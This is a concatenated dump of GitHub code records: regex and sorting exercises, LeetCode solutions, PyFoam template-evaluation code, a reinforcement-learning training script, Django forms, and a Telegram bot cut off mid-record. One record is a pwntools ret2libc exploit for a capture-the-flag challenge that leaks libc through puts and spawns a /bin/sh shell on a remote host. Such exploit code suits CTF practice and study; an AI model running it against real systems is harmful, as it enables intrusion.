#匹配的是单词的边界是ha加上[a-z]的字母以及*(后续任意个数的字符)\nprint(len(ret))\nprint(ret)\n\n#secondary\nscheme = re.compile(r'\\bha[a-z]*')\nret2 = scheme.findall('a happy happpppp sss',1,20)\nprint(ret2)","repo_name":"Sagiri-lzumi/python-learning-sharing","sub_path":"re正则表达式/re_findall.py","file_name":"re_findall.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17163493020","text":"from pwn import *\r\nfrom LibcSearcher import *\r\nimport sys\r\nremote_addr = [\"43.143.254.94\",10793]\r\nlibc=ELF('./libc-2.31.so')\r\nelf = ELF('./Safe_Program')\r\nif len(sys.argv) == 1:\r\n context.log_level=\"debug\" \r\n #p = process([\"qemu-aarch64\", \"-L\", \"/usr/aarch64-linux-gnu/\", \"-g\",\"1234\",\"./stack\"]) \r\n #p = process([\"qemu-aarch64\", \"-L\", \".\", \"./stack\"]) \r\n p = process(\"./Safe_Program_patched\")\r\n context(arch='amd64', os='linux')\r\nif len(sys.argv) == 2 :\r\n if 'r' in sys.argv[1]:\r\n p = remote(remote_addr[0],remote_addr[1])\r\n if 'n' not in sys.argv[1]:\r\n context.log_level=\"debug\" \r\n #context(arch = 'amd64', os = 'linux')\r\nr = lambda : p.recv()\r\nrl = lambda : p.recvline()\r\nrc = lambda x: p.recv(x)\r\nru = lambda x: p.recvuntil(x)\r\nrud = lambda x: p.recvuntil(x, drop=True)\r\ns = lambda x: p.send(x)\r\nsl = lambda x: p.sendline(x)\r\nsa = lambda x, y: p.sendafter(x, y)\r\nsla = lambda x, y: p.sendlineafter(x, y)\r\nshell = lambda : p.interactive()\r\npr = lambda name,x : log.info(name+':'+hex(x))\r\n\r\n#gdb.attach(p, '''\r\n# b *0x401245\r\n#''')\r\n\r\npop_rdi = 0x401393\r\nputs_got = elf.got['puts']\r\nputs_plt = elf.plt['puts']\r\nmain = 0x401247 \r\nret = 0x40101a\r\n\r\nru(b'now:\\n\\n')\r\npayload = b'a' * (0x80 + 8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)\r\ns(payload)\r\nleak_addr = u64(rc(6).ljust(8, b'\\x00'))\r\npr('leak_addr', leak_addr)\r\nlibc_base = leak_addr - libc.sym['puts']\r\npr('libc_base', libc_base)\r\nsystem = libc_base + libc.sym['system']\r\nbinsh = libc_base + next(libc.search(b'/bin/sh'))\r\n\r\nru(b'now:\\n\\n')\r\npayload = b'a' * (0x80 + 8) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)\r\ns(payload)\r\n\r\nshell()\r\n","repo_name":"BattiestStone4/pwn-problems","sub_path":"HSCCTF_Safe-Program/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"28484347254","text":"# https://leetcode.com/problems/queue-reconstruction-by-height/description/\n\nclass Solution:\n def reconstructQueue(self, people: List[List[int]]) -> List[List[int]]:\n queue = []\n \n for k, h in sorted([k, -h] for h, k in people):\n idx = 0\n front = k\n while idx < len(queue) and front > 0:\n if queue[idx][0] >= -h:\n front -= 1\n idx += 1\n queue.insert(idx, [-h, k])\n \n return queue\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_58/queue-reconstruction-by-height.py","file_name":"queue-reconstruction-by-height.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30864577799","text":"class Solution:\n def missingNumber(self, arr: List[int]) -> int:\n l = len(arr)\n step = (arr[l - 1] - arr[0]) // l\n for i in range(l - 1):\n if arr[i + 1] - arr[i] != step:\n return arr[i] + step\n \n # if step is 0:\n return arr[0]","repo_name":"Maxwell-Yang-2001/maxwell-yang-leetcode","sub_path":"1228-missing-number-in-arithmetic-progression/1228-missing-number-in-arithmetic-progression.py","file_name":"1228-missing-number-in-arithmetic-progression.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285159593","text":"# ICE Revision: $Id: TemplateFile.py,v de6dbd122d11 2020-02-25 11:02:08Z bgschaid $\n\nimport re\nfrom math import *\nimport sys\n\nfrom PyFoam.Error import error,warning\nfrom PyFoam.ThirdParty.pyratemp import Template as PyratempTemplate\nfrom PyFoam.ThirdParty.pyratemp import EvalPseudoSandbox,TemplateRenderError\nfrom PyFoam.ThirdParty.pyratemp import Renderer as PyratempRenderer\n\nfrom PyFoam.ThirdParty.six import iteritems,exec_,print_,PY3\n\nclass RendererWithFilename(PyratempRenderer):\n \"\"\"Usual renderer but report a filename\"\"\"\n\n def __init__(self, evalfunc, escapefunc,filename=None):\n PyratempRenderer.__init__(self, evalfunc, escapefunc)\n\n self.fileName = filename\n\n def reportString(self,expr, err):\n result=\"Cannot eval expression '%s'. (%s: %s)\" %(expr, err.__class__.__name__, err)\n if self.fileName:\n result+=\" in file \"+self.fileName\n return result\n\n def _eval(self, expr, data):\n \"\"\"evalfunc with error-messages\"\"\"\n try:\n return self.evalfunc(expr, data)\n except (TypeError,NameError,IndexError,KeyError,AttributeError, SyntaxError):\n err = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n raise TemplateRenderError(self.reportString(expr,err))\n\nclass TolerantRenderer(RendererWithFilename):\n \"\"\"Variant of the renderer that doesn't choke on problems with evaluations\"\"\"\n\n def __init__(self, evalfunc, escapefunc,filename=None):\n RendererWithFilename.__init__(self, evalfunc, escapefunc,filename=filename)\n\n def _eval(self, expr, data):\n \"\"\"evalfunc with error-messages\"\"\"\n try:\n return self.evalfunc(expr, data)\n except (TypeError,NameError,IndexError,KeyError,AttributeError, SyntaxError):\n err = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n warning(self.reportString(expr,err))\n return \"Template evaluation ERROR: \"+self.reportString(expr,err)\n\nexecIdString=\"this is meant to be executed:\"\nsubstituteIdString=\"substitute current values into this string:\"\n\nclass PyratempPreprocessor(object):\n \"\"\"This class preprocesses the input that is give to it in such a\n way that the old format (using $$ at the line beginnings and $\n .. $ for expressions) is reworked into something that pyratemp understands\n \"\"\"\n def __init__(self,\n dovarline=True,\n doexpr=True,\n expressionDelimiter=\"$\",\n assignmentLineStart=\"$$\",\n allowExec=False,\n assignmentDebug=None,\n specials=[]):\n \"\"\"Create the regexp once for performance reasons\n :param dovarline: look for variable lines that start with $$\n :param doexpr: substitute expressions that are between $\n :param expressionDelimiter: character/string that is used before and after an\n expression. After the expression the reverse of the string is used\n :param assignmentLineStart: character sequence that signals an assignment line\n :param assignmentDebug: Add a commented line to debug assignments. Prefix used is this parameter\n :param allowExec: allows execution of code. This is potentially unsafe\n :param specials: a list. If any expression starts with one of these values then\n the full expression (including delimiters) is left verbatim in the template\"\"\"\n\n self.clip=len(expressionDelimiter)\n self.specials=specials\n\n tmp=list(expressionDelimiter)\n tmp.reverse()\n\n self.expressionDelimiter=re.escape(expressionDelimiter)\n self.expressionDelimiterEnd=re.escape(\"\".join(tmp))\n self.expressionDelimiterRaw=expressionDelimiter\n self.expressionDelimiterEndRaw=\"\".join(tmp)\n\n # print self.expressionDelimiter,self.expressionDelimiterEnd\n\n self.assignmentLineStart=assignmentLineStart\n self.assignmentDebug=assignmentDebug\n\n self.expr=re.compile(\"%s[^$!\\n]+?%s\" % (self.expressionDelimiter,self.expressionDelimiterEnd))\n self.dovarline=dovarline\n self.doexpr=doexpr\n\n self.allowExec=allowExec\n\n def __call__(self,original):\n \"\"\"This does the actual work\"\"\"\n\n if len(original)==0:\n return original\n\n lines=original.split(\"\\n\")\n if lines[-1]==\"\":\n lines=lines[:-1]\n\n result=\"\"\n\n def isVarname(name):\n return re.match(\"[_A-Za-z][_A-Za-z0-9]*$\",name.strip())!=None\n\n for l in lines:\n skipLine=False\n if l[:len(self.assignmentLineStart)]==self.assignmentLineStart and self.dovarline:\n tmp=l[len(self.assignmentLineStart):].split(\"=\")\n if len(tmp)!=2 or not isVarname(tmp[0]):\n if self.allowExec:\n execString=l[len(self.assignmentLineStart):].replace(\"\\\\\",\"\\\\\\\\\").replace(\"\\\"\",\"\\\\\\\"\")\n result+='$!setvar(\"%s\", \"%s\")!$#!' % (\n \"dummyVarForExecution\",\n execIdString+execString.strip()\n )\n result+=\"\\n\"\n skipLine=True\n else:\n error(\"Each definition must be of the form: <name>=<value>\",\n \"The string\",l,\"is not. Try running the utility with the option --allow-exec-instead-of-assignment\")\n else:\n # if tmp[1].find('\"')>=0:\n # error(\"There is a \\\" in\",tmp[1],\"\\npyratemp can't cope with that'\")\n exprStr=tmp[1].replace(\"\\\\\",\"\\\\\\\\\").replace(\"\\\"\",\"\\\\\\\"\")\n result+='$!setvar(\"%s\", \"%s\")!$#!' % (tmp[0].strip(),exprStr.strip())\n result+=\"\\n\"\n if self.assignmentDebug and self.doexpr:\n l=self.assignmentDebug+\" \"+tmp[0].strip()+\" \"+self.expressionDelimiterRaw+tmp[0].strip()+self.expressionDelimiterEndRaw\n else:\n continue\n elif self.doexpr:\n nl=\"\"\n iStart=0\n for m in self.expr.finditer(l):\n inner=l[m.start()+self.clip:m.end()-self.clip]\n hasSpecial=False\n nl+=l[iStart:m.start()]\n for k in self.specials:\n if len(k)<=len(inner):\n if inner[:len(k)]==k:\n hasSpecial=True\n substVarName=\"dummyVarForSubstitution\"\n # nl+=l[m.start():m.end()]\n nl+='$!setvar(\"%s\", \"%s\")!$#!\\n' % (\n substVarName,\n substituteIdString+l[m.start():m.end()]\n )\n nl+='$!'+substVarName+'!$'\n\n if not hasSpecial:\n nl+=\"$!\"+inner+\"!$\"\n iStart=m.end()\n result+=nl+l[iStart:]+\"\\n\"\n else:\n if not skipLine:\n result+=l+\"\\n\"\n\n # remove trailing newline if the original had none\n if original[-1]!='\\n' and result[-1]=='\\n':\n result=result[:-1]\n\n return result\n\nclass TemplateFileOldFormat(object):\n \"\"\"Works on template files. Does calculations between $$.\n Lines that start with $$ contain definitions\"\"\"\n\n def __init__(self,name=None,content=None):\n \"\"\"Exactly one of the parameters must be specified\n :param name: name of the template file.\n :param content: Content of the template\"\"\"\n if name==None and content==None:\n error(\"Either a file name or the content of the template must be specified\")\n if name!=None and content!=None:\n error(\"Both: a file name and the content of the template were specified\")\n if content!=None:\n template=content\n else:\n template=open(name).read()\n self.buildTemplate(template)\n\n def buildTemplate(self,template):\n lines=template.split(\"\\n\")\n self.expressions={}\n self.template=\"\"\n for l in lines:\n if l[:2]!=\"$$\":\n self.template+=l+\"\\n\"\n else:\n tmp=l[2:].split(\"=\")\n if len(tmp)!=2:\n error(\"Each definition must be of the form: <name>=<value>\",\n \"The string\",l,\"is not\")\n self.expressions[tmp[0].strip()]=tmp[1]\n\n def writeToFile(self, outfile, vals, gzip=False):\n \"\"\"In the template, replaces all the strings between $$\n with the evaluation of the expressions and writes the results to a file\n :param outfile: the resulting output file\n :param vals: dictionary with the values\n :param gzip: Zip the file (and add a .gz to the name)\"\"\"\n\n from os import path\n\n output = self.getString(vals)\n\n if path.splitext(outfile) == \".gz\":\n gzip = True\n elif path.exists(outfile + \".gz\"):\n outfile += \".gz\"\n gzip = True\n elif gzip:\n outfile += \".gz\"\n\n if gzip:\n import gzip as gz\n if PY3:\n output = output.encode()\n gz.open(outfile, \"wb\").write(output)\n unzipped=path.splitext(outfile)[0]\n if path.exists(unzipped):\n warning(\"Removing\",unzipped,\"because it might shadow generated\",\n outfile)\n from os import unlink\n unlink(unzipped)\n else:\n open(outfile, \"w\").write(output)\n\n return outfile\n\n def getString(self,vals):\n \"\"\"In the template, replaces all the strings between $$\n with the evaluation of the expressions\n :param vals: dictionary with the values\n :returns: The string with the replaced expressions\"\"\"\n\n symbols=vals.copy()\n\n exp=re.compile(\"\\$[^$\\n]*\\$\")\n\n for n,e in iteritems(self.expressions):\n if n in vals:\n error(\"Key\",n,\"already existing in\",vals)\n symbols[n]=\"(\"+str(e)+\")\"\n\n keys=list(symbols.keys())\n\n keys.sort(key=len,reverse=True)\n\n input=self.template[:]\n m=exp.search(input)\n while m:\n a,e=m.span()\n pre=input[0:a]\n post=input[e:]\n mid=input[a+1:e-1]\n\n old=\"\"\n while old!=mid:\n old=mid\n for k in keys:\n if mid.find(k)>=0:\n mid=mid.replace(k,str(symbols[k]))\n break\n\n try:\n input=pre+str(eval(mid))+post\n except ArithmeticError:\n e = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n print_(\"Problem evaluating\",mid)\n raise e\n\n m=exp.search(input)\n\n return input\n\nclass EvalPseudoSandboxWithMath(EvalPseudoSandbox):\n \"\"\"Add mathematical functions to the valid functons\"\"\"\n def __init__(self,allowExec=False):\n EvalPseudoSandbox.__init__(self)\n import math\n for o in dir(math):\n if o[0]!=\"_\":\n self.register(o,getattr(math,o))\n\n from PyFoam.ThirdParty.six.moves import builtins as __builtin__\n self.register(\"set\",__builtin__.set)\n\n if allowExec:\n del self.eval_allowed_globals[\"__import__\"]\n self.register(\"__import__\",__builtins__[\"__import__\"])\n\n def compile(self, expr,mode=\"eval\"):\n \"\"\"Compile a python-eval-expression. Overrides the default implementation\n to allow '_[1]' as a valid name\n \"\"\"\n if expr not in self._compile_cache:\n c = compile(expr, \"\", mode)\n for i in c.co_names: #prevent breakout via new-style-classes\n if i[0] == '_':\n if i[1]!='[' or i[-1]!=']':\n raise NameError(\"Name '%s' is not allowed.\" %(i))\n self._compile_cache[expr] = c\n return self._compile_cache[expr]\n\n def eval(self, expr, locals):\n \"\"\"Eval a python-eval-expression.\n\n Sets ``self.locals_ptr`` to ``locales`` and compiles the code\n before evaluating.\n \"\"\"\n\n if expr[:len(substituteIdString)]==substituteIdString:\n goOn=True\n replacement=expr[len(substituteIdString):]\n while goOn:\n try:\n value=replacement % locals\n goOn=False\n except KeyError:\n e = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n kExpr=\"%(\"+e.args[0]+\")\"\n replacement=replacement.replace(kExpr,\"%\"+kExpr)\n\n return value\n # print value\n\n sav = self.locals_ptr\n self.locals_ptr = locals\n doEval=True\n\n if expr[:len(execIdString)]==execIdString:\n doEval=False\n\n if doEval:\n globals= {\"__builtins__\":self.eval_allowed_globals}\n if PY3:\n globals.update(locals)\n try:\n x = eval(self.compile(expr),globals, locals)\n except:\n e = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n print_(\"Problem avaluating\",expr,\":\",e)\n raise e\n else:\n # globals= {\"__builtins__\":self.eval_allowed_globals}\n globals= {\"__builtins__\":__builtins__}\n expr=expr[len(execIdString):]\n exec_(self.compile(expr,mode=\"exec\"),globals,locals)\n x = None\n self.locals_ptr = sav\n return x\n\nclass EvalPseudoSandboxWithMathWithImport(EvalPseudoSandboxWithMath):\n \"\"\"Class that allows the import of packages\"\"\"\n def __init__(self):\n EvalPseudoSandboxWithMath.__init__(self,allowExec=True)\n\nclass TemplateFile(TemplateFileOldFormat):\n \"\"\"Works on template files. Does calculations between $$.\n Lines that start with $$ contain definitions\"\"\"\n\n def __init__(self,\n name=None,\n content=None,\n encoding=\"utf-8\",\n expressionDelimiter=\"|\",\n assignmentLineStart=\"$$\",\n assignmentDebug=None,\n specials=[],\n renderer_class=None,\n tolerantRender=False,\n allowExec=False\n ):\n \"\"\"Exactly one of the parameters must be specified\n :param name: name of the template file.\n :param content: Content of the template\n :param expressionDelimiter: character/string that delimits expression strings.\n :param assignmentLineStart: Start of a line that holds an assignment operation\n :param assignmentDebug: Add a commented line to debug assignments. Prefix used is this parameter\n :param allowExec: allow execution (and import). This is potentially unsafe\n :param special: list with strings that leave expression untreated\"\"\"\n\n self.expressionDelimiter=expressionDelimiter\n self.assignmentLineStart=assignmentLineStart\n self.assignmentDebug=assignmentDebug\n self.specials=specials\n self.allowExec=allowExec\n\n super(TemplateFile,self).__init__(name=name,\n content=content,\n )\n\n if renderer_class==None:\n if tolerantRender:\n class ConcreteTolerantRenderer(TolerantRenderer):\n def __init__(self,evalfunc, escapefunc):\n TolerantRenderer.__init__(self,\n evalfunc,\n escapefunc,filename=name)\n\n renderer_class=ConcreteTolerantRenderer\n else:\n class ConcreteRenderWithFileName(RendererWithFilename):\n def __init__(self,evalfunc, escapefunc):\n RendererWithFilename.__init__(self,\n evalfunc,\n escapefunc,filename=name)\n\n renderer_class=ConcreteRenderWithFileName\n\n if allowExec:\n sandbox=EvalPseudoSandboxWithMathWithImport\n else:\n sandbox=EvalPseudoSandboxWithMath\n\n self.ptemplate=PyratempTemplate(string=self.template,\n eval_class=sandbox,\n renderer_class=renderer_class,\n encoding=encoding,\n escape=None\n )\n\n def buildTemplate(self,template):\n self.template=PyratempPreprocessor(assignmentLineStart=self.assignmentLineStart,\n expressionDelimiter=self.expressionDelimiter,\n assignmentDebug=self.assignmentDebug,\n specials=self.specials,\n allowExec=self.allowExec\n )(template)\n\n def getString(self,vals):\n \"\"\"In the template, replaces all the strings between $$\n with the evaluation of the expressions\n :param vals: dictionary with the values\n :returns: The string with the replaced expressions\"\"\"\n\n return self.ptemplate(**vals)\n\n# Should work with Python3 and Python2\n","repo_name":"nextfoam/baram","sub_path":"PyFoam/Basics/TemplateFile.py","file_name":"TemplateFile.py","file_ext":"py","file_size_in_byte":17875,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"2509761059","text":"\nfrom gym_envs.dna_error_detection_env import DNA_Error_Detection_Env\nfrom gym_envs.nucleotide_wise_processing.single_run_with_multiple_actions.dna_error_detection_with_dnabert_masking_env import DNA_Error_Detection_With_Masking_Correction_Env\nfrom gym_envs.nucleotide_wise_processing.single_run_with_multiple_actions.dna_error_detection_single_run_env import DNA_Error_Detection_Single_Run_Env\nfrom gym_envs.nucleotide_wise_processing.single_action_with_multiple_runs.dna_error_detection_single_action_per_run import DNA_Error_Detection_Single_Action_Per_Run_Env\n\nfrom gym_envs.nucleotide_wise_processing.single_run_with_multiple_actions.dna_error_correction_single_run_env import DNA_Error_Correction_Single_Run_Env\nfrom gym_envs.sequential_processing.dna_error_detection_sequential_env import DNA_Error_Detection_Sequential_Env\n\nfrom stable_baselines3 import A2C, DQN\n#from stable_baselines3\nfrom sb3_contrib import RecurrentPPO\n\nfrom utilities.plot_manager import PlotManager\n\nBASE_PATH = \"/Users/I570101/Documents/Bachelor-Thesis/DNA_RL/\"\n\nLEARNING_RATE = 0.0001\n\nBERT_ENCODE_MODEL = \"BERT\"\nBERT_LANG_MODEL = \"BERT_LM\"\nBERT_MODEL = BERT_ENCODE_MODEL\n\nENV = None\nERROR_RATE = 0.1\nSAMPLE_SIZE = 100\nMODEL = RecurrentPPO\nLSTM_MULTI_POLICY = \"MultiInputLstmPolicy\"\nLSTM_POLICY = \"MlpLstmPolicy\"\nSB3_POLICY = LSTM_POLICY\n\nif MODEL == A2C:\n SB3_POLICY = \"MlpPolicy\"\n\n\nKMER_SHIFT = 0 # -1 = First base of triplet / 0 = middle base of triplet / 1 = last base of triplet\n\nMODE = 1\n\nif MODE == 1: # detect multiple errors in a single iteration\n ENV = DNA_Error_Detection_Single_Run_Env\n MODEL_NAME = \"DNA_detection_single_run\"\nelif MODE == 2: # detect one error per iteration for multiple runs\n ENV = DNA_Error_Detection_Single_Action_Per_Run_Env\n MODEL_NAME = \"DNA_detection_multi_run\"\nelif MODE == 3:\n ENV = DNA_Error_Correction_Single_Run_Env\n MODEL_NAME = \"DNA_correction_single_run\"\nelif MODE == 4:\n ENV = DNA_Error_Detection_Sequential_Env\n MODEL_NAME = \"DNA_detection_sequentially\"\nelif MODE == 5: \n ENV = DNA_Error_Detection_With_Masking_Correction_Env\n MODEL_NAME = \"DNA_masking_correction\"\n\n\nMODEL_NAME += \"_\" + str(KMER_SHIFT)# +\"_0.000001\"\n\nMODEL_PATH = BASE_PATH + \"model_data/\" + BERT_MODEL + '/' + MODEL.__name__ + '/ErrorRate' + str(ERROR_RATE)\nMODEL_PATH += '/' + MODEL_NAME \n\nDNA_PATH = BASE_PATH + \"seq1.txt\"\n\nprint(MODEL_PATH)\n\n\ndef train(model, env, no_of_steps, make_plot = True):\n if make_plot:\n plot_man = PlotManager()\n plot_man.load_historical_plot_data(MODEL_PATH + \"_hist.npy\")\n env.set_plot_data(\n (plot_man.errors_corrected_history or [0])[-1], \n (plot_man.errors_found_history or [0])[-1], \n (plot_man.errors_missed_history or [0])[-1], \n (plot_man.errors_made_history or [0])[-1], \n (plot_man.corrects_found_history or [0])[-1]\n )\n\n for counter in range(0,no_of_steps):\n model.learning_starts = 100\n model.learn(total_timesteps=1000)\n model.save(MODEL_PATH)\n \n if make_plot:\n plot_man.append_plot_data(env.get_plot_data())\n plot_man.save_historical_plot_data(MODEL_PATH + \"_hist.npy\")\n plot_man.create_plot_and_save(MODEL_PATH + \"_fig1\")\n\ndef predict(model, env):\n\n obs = env.reset()\n\n while True:\n action, _states = model.predict(obs)\n obs, rewards, dones, info = env.step(action)\n\n if (dones):\n break\n \ndef main():\n seq = open(DNA_PATH, \"r\").read().replace('\\n', '').upper()\n use_lm = True\n if BERT_MODEL == \"BERT\": use_lm = False\n env = ENV(error_rate=ERROR_RATE, use_bert_for_masked_lm=use_lm, kmer_shift=KMER_SHIFT, seq_len=SAMPLE_SIZE)\n lr = LEARNING_RATE\n\n model = MODEL(SB3_POLICY, env, verbose=1,learning_rate = lr, device='cuda')\n # n_steps = 2048,\n # batch_size = 2048,\n # n_epochs=1,\n # use_sde=True\n \n try:\n custom_objects = { 'learning_rate': lr}\n model = MODEL.load(MODEL_PATH, env, custom_objects=custom_objects)\n except Exception as e: print(e)\n\n train(model, env, 10000)\n\n predict(model, env)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"fabianxvogt/Bachelor-Thesis","sub_path":"DNA_RL/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14553536841","text":"from django import forms\nfrom django.forms import ModelForm, TextInput\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm\n\nfrom .models import Profile, Review, Inquiry\n\nclass ProfileForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Profile\n\t\tfields = ('avatar', 'description','city')\n\n\t\tlabels = {\n 'description': 'Opis',\n 'city': 'Miasto',\n }\n\nclass ReviewForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Review\n\t\tfields = ('name', 'email', 'company', 'position', 'message')\n\n\t\tlabels = {\n\t\t\t'name': 'Imię i Nazwisko',\n\t\t\t'email': 'E-Mail',\n\t\t\t'company': 'Firma',\n\t\t\t'position': 'Rola w firmie',\n\t\t\t'message': 'Opinia',\n\t\t}\n\nclass InquiryForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Inquiry\n\t\tfields = ('name', 'email', 'tel', 'message')\n\n\t\tlabels = {\n\t\t\t'name': 'Imię i Nazwisko',\n\t\t\t'email': 'E-Mail',\n\t\t\t'tel': 'Telefon',\n\t\t\t'message': 'Wiadomość',\n\t\t}\n\n\nclass AccountForm(UserChangeForm):\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ('first_name','last_name', 'password')\n\n\t\twidgets = {\n 'first_name': TextInput(attrs={'placeholder': 'Imię'}),\n }\n\n\nclass MessageForm(forms.Form):\n\tuser = User.objects.all()\n\n\tclient = forms.CharField(\n\t\tlabel=_(\"Twoje imię i nazwisko\"),\n\t\twidget=forms.TextInput,\n\t\trequired=True,\n\t)\n\temail = forms.EmailField(\n\t\tlabel=_(\"Email kontaktowy\"),\n\t\t\n\t\trequired=True,\n\t)\n\ttel = forms.CharField(\n\t\tlabel=_(\"Telefon\"),\n\t\twidget=forms.TextInput,\n\t\trequired=False,\n\t)\n\trecipient = forms.ModelChoiceField(\n\t\tlabel=_(\"Wybierz doradcę nieruchomości\"),\n\t\tqueryset=Profile.objects.filter(city__gt='', description__gt=''),\n\t\trequired=False,\n\t)\n\tmessage = forms.CharField(\n\t\tlabel=_(\"Wiadomość\"),\n\t\twidget=forms.Textarea,\n\t\trequired=True,\n\t)\n\n\tdef __init__(self, request, *args, **kwargs):\n\t\tsuper(MessageForm, self).__init__(*args, **kwargs)\n\t\tself.request = request\n\t\tself.fields[\"recipient\"].queryset = \\\n\t\t\tself.fields[\"recipient\"].queryset.\\\n\t\t\texclude(pk=request.user.pk)\n\n\tdef save(self):\n\t\tcleaned_data = self.cleaned_data\n\t\tsend_mail(\n\t\t\tsubject=ugettext(\"A message from %s\") % \\\n\t\t\t\t'ZnajdźMiDom',\n\t\t\tmessage=cleaned_data[\"message\"],\n\t\t\tfrom_email='biuro@idealnyposrednik.pl',\n\t\t\trecipient_list=[\n\t\t\t\t'biuro@idealnyposrednik.pl',\n\t\t\t],\n\t\t\tfail_silently=True,\n\t\t)","repo_name":"dabrodev/django-prodir-pl","sub_path":"profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23081164834","text":"from collections import Counter\nN = int(input())\nC = Counter()\nfor i in range(N):\n C[input()] += 1\nn = C.most_common(1)[0][1]\nc = [k for k, v in C.items() if v == n]\nc.sort()\nfor _c in c:\n print(_c)\n","repo_name":"e5pe0n/algorithm-training","sub_path":"AtCoder/ACP/BootCamp4b/Easy100/python/C_Poll.py","file_name":"C_Poll.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38285725585","text":"import random, time\n\nnum = []\nnum2 = []\nnum3 = []\n\nfor i in range(100):\n num.append(random.randint(1, 1000))\n\nfor i in range(1000):\n num2.append(random.randint(1, 10000))\n\nfor i in range(10000):\n num3.append(random.randint(1, 100000))\n\n# num.sort()\n# num2.sort()\n# num3.sort()\n\n\nnum.sort()\nnum.reverse()\nnum2.sort()\nnum2.reverse()\nnum3 = sorted(num3, reverse=True)\n\n\ndef partition(lis, pivot):\n less = []\n equal = []\n greater = []\n\n for i in lis:\n if i < pivot:\n less.append(i)\n elif i == pivot:\n equal.append(i)\n else:\n greater.append(i)\n\n return less, equal, greater\n\n\ndef quicksort(lis):\n if len(lis) == 0:\n return lis\n\n pivot = random.randint(0, len(lis) - 1)\n\n x = partition(lis, lis[pivot])\n\n return quicksort(x[0]) + x[1] + quicksort(x[2])\n\n\ndef quicksortnonrandom(lis, pivot):\n if len(lis) == 0:\n return lis\n\n x = partition(lis, lis[pivot])\n\n return quicksort(x[0]) + x[1] + quicksort(x[2])\n\n\ndef merge(a, b):\n merged = []\n index = 0\n while len(a) != 0 and len(b) != 0:\n if a[index] <= b[index]:\n merged.append(a[index])\n a.pop(index)\n elif a[index] >= b[index]:\n merged.append(b[index])\n b.pop(index)\n\n merged = merged + b\n merged = merged + a\n\n return merged\n\n\ndef mergesort(lis):\n mid = len(lis) // 2\n if len(lis) == 1:\n return lis\n\n return merge(mergesort(lis[mid:]), mergesort(lis[:mid]))\n\n\nprint(\"SORTING TIMING TEST WITH 100 ITEMS\\n\")\nstart = time.time()\nmergesort(num)\nend = time.time()\nprint(\"Mergesort: \" + str(end - start) + \"seconds\")\nstart = time.time()\nquicksort(num)\nend = time.time()\nprint(\"Quicksort: \" + str(end - start) + \"seconds\")\nstart = time.time()\nquicksortnonrandom(num, 0)\nend = time.time()\nprint(\"Quicksort(nonrandom pivot): \" + str(end - start) + \"seconds\")\n\nprint(\"\\nSORTING TIMING TEST WITH 1000 ITEMS\\n\")\nstart = time.time()\nmergesort(num2)\nend = time.time()\nprint(\"Mergesort: \" + str(end - start) + \"seconds\")\nstart = time.time()\nquicksort(num2)\nend = time.time()\nprint(\"Quicksort: \" + str(end - start) + \"seconds\")\nstart = time.time()\nquicksortnonrandom(num2, 0)\nend = time.time()\nprint(\"Quicksort(nonrandom pivot): \" + str(end - start) + \"seconds\")\n\nprint(\"\\nSORTING TIMING TEST WITH 10000 ITEMS\\n\")\nstart = time.time()\nmergesort(num3)\nend = time.time()\nprint(\"Mergesort: \" + str(end - start) + \"seconds\")\nstart = time.time()\nquicksort(num3)\nend = time.time()\nprint(\"Quicksort: \" + str(end - start) + \"seconds\")\nstart = time.time()\nquicksortnonrandom(num3, 0)\nend = time.time()\nprint(\"Quicksort(nonrandom pivot): \" + str(end - start) + \"seconds\")","repo_name":"AuritroSaha/auritro_coding_portfolio","sub_path":"JUNI/Python Level 3/AM11/Sorting Comparison.py","file_name":"Sorting Comparison.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24898792549","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler\nfrom telegram import InlineKeyboardMarkup, InlineKeyboardButton\nimport logging\nimport os\nimport numpy as np\nfrom recipe_manager import RecipeManager\n\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nTOKEN = os.environ.get('TELEGRAM_TOKEN', None)\n\ndef start(bot, update):\n \"\"\"Send a message when the command /start is issued.\"\"\"\n update.message.reply_text(\"\"\"Hi! Holly here, your friendly culinary assistant. Send /help to see what I can do!\n \"\"\")\n\ndef help(bot, update):\n \"\"\"Send a message when the command /help is issued.\"\"\"\n update.message.reply_text(\"\"\"1. Search for anything and I'll show matching 